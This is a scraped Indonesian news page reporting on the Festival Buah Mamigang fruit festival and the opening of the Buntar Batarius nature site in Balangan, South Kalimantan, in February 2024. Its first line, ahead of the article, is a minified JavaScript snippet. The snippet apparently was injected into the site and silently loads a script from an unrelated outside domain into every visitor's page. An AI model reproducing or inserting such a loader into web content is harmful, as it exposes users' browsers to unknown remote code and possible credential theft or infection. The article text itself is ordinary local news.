(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Ragam Buah Lokal dalam Festival Buah Mamigang


KANALKALIMANTAN.COM, PARINGIN – Pemerintah Desa Mamigang menggelar Festival Buah Mamigang sekaligus peresmian wisata alam Buntar Batarius, Rabu (7/2/2024). Festival ini diresmikan Camat Halong Rahmadi di halaman kantor Desa Mamigang.

Acara dihadiri ribuan pengunjung ini berlangsung meriah. Menariknya di sini para pengunjung bisa langsung menikmati buah-buahan lokal secara gratis, sekaligus ikut menyaksikan pagelaran kesenian dan ritual adat Batandik.

Setidaknya ada sekitar 25 buah lokal yang dipamerkan pada festival buah seperti durian, pampakin, mantaula, mahrawin, kapul, tanduruan, babuku, maritam, kambayau, langsat dan aneka buah lokal lainnya.

Camat Halong Rahmadi mengucapkan terima kasih dan apresiasi kepada seluruh panitia yang telah menyelenggarakan festival buah ini.

Baca juga: Protes Pemilik Kandang Babi Tak Punya Pekerjaan Selain Beternak

Karena menurutnya ini adalah salah satu potensi alam luar biasa yang dimiliki Kabupaten Balangan, sehingga keindahan alam dam kekayaan buah-buahan dapat dinikmati bersama oleh masyarakat sekaligus wisatawan.

Rahmadi berharap melalui festival tersebut dapat menjadi momentum untuk memperkokoh rasa kebersamaan dan solidaritas dalam mendukung serta melestarikan potensi alam agar bisa dinikmati oleh para generasi selanjutnya.

Sementara itu, Kepala Desa Mamigang Bagus Susanto mengatakan, buah yang diambil ini merupakan buah asli dari kawasan hutan di Desa Mamigang.

“Untuk kegiatan hari ini dalam rangka pembukaan wisata Buntar Batarius, oleh karena itu kita sandingkan dengan festival buah yang mana wisata dan desa kita hampir 80 persen berada di kawasan hutan, di sanalah buah itu kami ambil,” katanya.

Baca juga: Disperkim Kalsel Monev Program Bantuan RTLH di HSU

Kades Bagus mengharapkan agar Festival Buah Mamigang bisa terus terlaksana bahkan mampu menjadi event nasional.

“Ke depannya tetap melaksanakan festival buah khususnya di Desa Mamigang dan mudah-mudahan event kami ini menjadi event nasional dan akan menyelenggarakan lebih baik lagi ke depannya,” harapnya. (Kanalkalimantan.com/mcbalangan)

Editor: kk


Risa

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

9 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

9 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

10 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

10 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

10 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

10 jam ago

This website uses cookies.